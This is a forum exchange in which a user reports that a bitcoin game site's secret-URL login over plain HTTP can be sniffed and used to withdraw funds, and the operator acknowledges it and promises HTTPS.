Hello,
I would like to report a possible security hole in the current scheme of things.
The idea to use only 'url with secret' for logging in is neat but not entirely safe because the web server uses plain http with no encryption.
Let's say you open the site for the first time and it gives you secret like http://minefield.bitcoinlab.org/?secret=fngrOdO23tDOTuPW
Then you deposit some btc.
If someone is sniffing the traffic it is fairly easy to extract the GET /?secret=fngrOdO23tDOTuPW string from the HTTP request. Then he needs simply to open the site with that secret and he can withdraw the btc to address of his choice.
I can mention two solutions.
1/ get a https certificate and the run the website over ssl/tls. This will resolve the sniffing problem since all traffic would be encrypted.
2/ Make withdraw only possible to addresses from which deposits were received. But on second thought this is not very secure either. A hacker could break into your account, deposit minimal amount of btc and after the deposit is confirmed (and the sending address accepted as viable for withdraw) the hacker request the whole amount to his address.
Best~
I would like to report a possible security hole in the current scheme of things.
The idea to use only 'url with secret' for logging in is neat but not entirely safe because the web server uses plain http with no encryption.
Let's say you open the site for the first time and it gives you secret like http://minefield.bitcoinlab.org/?secret=fngrOdO23tDOTuPW
Then you deposit some btc.
If someone is sniffing the traffic it is fairly easy to extract the GET /?secret=fngrOdO23tDOTuPW string from the HTTP request. Then he needs simply to open the site with that secret and he can withdraw the btc to address of his choice.
I can mention two solutions.
1/ get a https certificate and the run the website over ssl/tls. This will resolve the sniffing problem since all traffic would be encrypted.
2/ Make withdraw only possible to addresses from which deposits were received. But on second thought this is not very secure either. A hacker could break into your account, deposit minimal amount of btc and after the deposit is confirmed (and the sending address accepted as viable for withdraw) the hacker request the whole amount to his address.
Best~
hey, yeah I'm aware of this, I do know what https is and what it is for
I don't think that this is very important, but I do plan to switch to https soon.
and on why I don't think its important:
the number of local networks being sniffed by attackers interested in bitcoin is super small, people that know what https and sniffing is, will make sure that they have a secure connection if they care to, and people that don't, will probably get owned anyway. so I'm maybe saving one person in a few millions, and this website didn't receive that much GET requests yet. and statistically, I'm saving them around 0.05 bitcoin...
but still, yes, https, soon.
PS
I may sound too dismissive, that's not the idea, thanks for reporting